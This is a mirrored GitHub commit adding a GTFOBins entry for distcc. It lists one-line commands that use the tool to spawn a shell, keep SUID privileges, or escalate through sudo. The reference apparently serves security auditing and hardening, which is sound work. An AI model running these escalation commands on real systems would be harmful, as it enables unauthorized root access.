mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 15:59:17 +01:00
add distcc
install: apt-get install -y distcc man: https://linux.die.net/man/1/distcc
This commit is contained in:
parent
57114a423c
commit
1f52a21411
9
_gtfobins/distcc.md
Normal file
9
_gtfobins/distcc.md
Normal file
@ -0,0 +1,9 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: distcc /bin/sh
|
||||||
|
suid:
|
||||||
|
- code: ./distcc /bin/sh -p
|
||||||
|
sudo:
|
||||||
|
- code: sudo distcc /bin/sh
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user